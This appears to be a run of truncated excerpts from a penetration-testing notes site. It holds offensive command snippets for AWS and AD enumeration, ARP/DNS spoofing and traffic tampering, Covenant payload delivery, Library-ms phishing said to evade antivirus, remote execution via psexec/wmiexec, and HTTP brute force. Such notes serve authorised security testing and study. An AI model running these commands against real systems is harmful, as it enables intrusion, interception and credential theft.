-
Pacu can be used to test an AWS account. Setup: Unauthorized enumeration Requires only an AWS access key and secret key. Enumerate roles. Create a list with possible roles to check. run iam__enum_roles --word-list /tmp/roles.txt --account-id $accountId Enumerate users which belong to a (previously found) role. Create also a list of possible user names. run iam__enum_users --word-list…
-
Initial (network) enumeration Check where a service is hosted by quering the nameserver records for our target domain: host -t ns $domain Get more information / confirmation via a whois query to one previously found domain. whois $previouslyFoundDomain Check where a host is running: host $domainhost $ipFromTheDomain Check more domains of this organisation / of…
-
Files with the extension .Library-ms are similar to macOS’s Volumes. They can contain files and directory which looks like local files on the Windows Explorer. Many AV/Malware systems does not detect them currently. Create a Windows Library “Directory” Preparation: Install somewhere a DAV share which is available from the victim’s system which points to a…
-
Short: A user opens a link (e.g. from a phishing email) which has a injection in the URL which is then executed on the site as long as the user is logged in. See also command injections post. Classes: Tip:
-
See also the Web brute force post.
-
Nmap has it’s own scripting language with which complex or recurring tasks can be automatized. See the manpage. And share/nmap/scripts. Vulnerability scan # nmap -sV -T5 -F $victim --script vuln | tee nmap-vuln.txt Better vulnerability scans (thanks to this source) cd /usr/share/nmap/scripts/vulscan/utilities/updater/ && ./updateFiles.sh nmap --script nmap-vulners -sV -sC -p22 $victim nmap --script vulscan -sV…
-
Mandatory Optional Use this script to list all endpoints for further research:
-
(!) If upload does not seem to work, change the suffix e.g. from .php to .pHp. More: File uploads / images
-
Bugs can only be found durring fuzzing code, which is executed. But which parts of the code of a target system is executing during a fuzzing session? And how we can improve our fuzzer to include also tests for code blocks which weren’t covered before? Dynamorio We’ll use now Dynamorio — a runtime code manipulation…
-
Scapy fundamentals Commands for the interactive scapy interpreter: conf.iface shows the currently used interface conf.iface='tun0' sets the interface to use ls shows all protocols ls(TCP) shows all known headers for a given protocol lsc shows build-in functions Details about a packet p: p shows general information p.summary() shows also general information p.show() shows each field and…
-
mitmdump is a proxy which can store and modify content. Change content of a third-party site Scenario: You want to manipulate some content from a website $target visits. Perform ARP-poisening with Bettercap, Ettercap, the http_hijack.py script or somehow else. Start mitmdump in transparent mode:mitmdump --mode transparent --replace /~s/wars/trek/or alternatively to read the new content from a…
-
A Ettercap successor, written in Go. Basic commands: Passive ARP probing: net.recon on net.recon off Active probing: net.probe on net.probe off Sniffing: set net.sniff.output /tmp/sniff.pcap // optional net.sniff on net.sniff off Spoofing: set arp.spoof.targets $target1, $target2, $target3 arp.spoof on arp.spoof off DNS Spoofing: set dns.spoof.domains target.domain // the domain which should be resolved as… set…
-
-NET attack framework: https://github.com/cobbr/Covenant Usage Create a listener on the attack system. Add a launcher to the listener. The attack system now provides a payload file the victim has to start. You can use UrbanBishop to inject the payload into a running process. As soon as the payload is executed, Covenant will show on the dashboard…
-
Various Show who else is logged in. qwinsta Open the Event Viewer and search in the looks. Have fun! Network enumeration Show the network configuration. Are there multiple interfaces? ipconfig /all Routing information route print Show current network connections. After checking this command: CHECK all ports with the previous found ones! netstat -ano Check the ARP cache…
-
With username/password With psexec (Prerequisites: ADMIN$ share is available, the user is part of the local administrator group on the target) With psexec via Metasploit use exploit/windows/smb/psexec With atexec (Impacket) atexec.py dom/user:pass@$target cmd.exe With wmiexec wmiexec.py domain.local/$target:$password@$ip With Smbmap smbmap -u ariley -p 'pass' -d WORKGROUP -x 'whoami' -H $target With Wmic (To run a…
-
Source on Github Creates screenshots from a list of URLs. Good way to get fast an overwiew over a new site. With nmap, use ‑oA file to save the output also as XML file. EyeWitness can use this file via ‑x file and make screenshots of all of this sites. EyeWitness.py --web -x webservers.xml
-
The usual order Network scan Detect hosts for a domain (use Seclist): for ip in $(cat common-subdomains.txt); do host $ip.megacorpone.com; done Reverse lookup: Find domains for addresses: for ip in $(seq 155 190); do host 50.7.67.$ip; done | grep -v "not found" Zonefile enumeration Grab zonefile from a random target domain: host -a -l fraunhofer.de ns3.fraunhofer.de…
-
Try this ressources if you can access files, but not listing them. http://pwnwiki.io/#!presence/windows/blind.md Cheat sheet 1 List In Apache and probably more systems you can “travel over” non-existing files because the path is shortened before checking the existence of a file. Example: /test/test.txt/../../index.html will return in an Apache the root’s index.html even if the test direcory and…
-
Without shell access With shell access Choose one method to enumerate. 1. User and group enumeration with net (!) See what roles/privileges THIS USER has. Also localy. Maybe he/she has already administrative privileges. whoami /all List (and store!) the users of the domain net user /domain List (and store!) information like full names, group memberships, etc.…
-
Collection of privsec scripts. To start, upload PowerView.ps1 and: powershell -exec bypass PS> Import-Module .\PowerView.ps1 See the github site for all commands. General enumeration powershell -exec bypass PS> . .\PowerUp.ps1 PS> Invoke-AllChecks Or: powershell.exe -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks" About users Enumerates all users. Get-NetUser Enumerate all users which does not require Kerberos preauth. Get-NetUser -PreauthNotRequired Returns…
-
Mainly post exploitation for AD environments. (Download — also included in Kali sources) Quick usage for privilege escalation General usage Metasploit syntax / PSE syntax Note: After usemodule don’t forget to go “back” and to “interact” with the agent to see job results! Commands with an asterix require a high-integrity Empire Agent. To upgrade one…
-
See the Impacket site for a short description of all tools. Tip: On Kali, use the command impacket-* Enumeration without authentication Determine the system architecture getArch.py -target $target Returns the listening RPC interface IDs. ifmap.py $target 135rpcdump.py $target Enumeration with half authentication Scenario: You have credentials for one AD user. Then, try to get all users for…
-
Tools to detect nmap ‑O nmap-chronos Tools to detect and validate p0f JS to list browser characteristics which could send back to an attacker via an AJAX request: /itsec/wp-content/uploads/2021/05/browser_detection.html Tools to impersonate Against browser/JS-based fingerprinting: Just tamper with values from the browser in about:config.
-
With Medusa Doesn’t seem to work with virtual hosts! medusa -h 10.11.1.49 -u bethany -P Dog_Names_normalized.txt -M http -m DIR:/~Public -T 2 With ncrack Doesn’t seem to work with virtual hosts! ncrack -vv --user bethany -P Dog_Names_normalized.txt http://10.11.1.49:9505 -m http:path=/~Public/ With metasploit Use module auxiliary/scanner/http/http_login Virtual hosts If Host headers are not supported: More
-
https://github.com/Tib3rius/AutoRecon Multi recon tool for broad scanning
-
Download: https://github.com/droope/droopescan droopescan scan drupal -u http://$target/ -t 32 Or just install via pip pip install droopescan
-
https://tools.kali.org/exploitation-tools/commix Created SQL injections on the fly.